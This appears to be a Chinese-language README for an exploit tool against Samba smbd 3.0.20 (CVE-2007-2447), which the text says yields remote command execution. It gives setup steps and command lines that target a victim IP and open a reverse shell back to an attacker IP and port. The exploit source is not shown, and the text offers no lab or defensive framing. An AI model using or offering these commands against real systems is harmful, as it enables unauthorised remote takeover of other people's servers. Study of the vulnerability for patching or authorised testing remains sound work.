本仓库包含一个针对 Samba smbd 3.0.20 (CVE-2007-2447) 的漏洞利用工具,允许通过精心构造的 SMB 请求远程执行命令。
该漏洞利用工具需要 Python 3 和少量依赖项。建议在运行前设置一个虚拟环境。
克隆仓库:
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
创建 Python 虚拟环境:
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(Windows 用户可使用:smb_env\Scripts\activate)
安装所需依赖:
pip install -r requirements.txt
虚拟环境设置完成后,可以使用以下语法执行漏洞利用工具:
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target:目标(受害)机器的 IP 地址。-a / --attacker:攻击者监听器的 IP 地址。-p / --port:建立反向 Shell 连接的端口。完成后,使用以下命令退出虚拟环境:
deactivate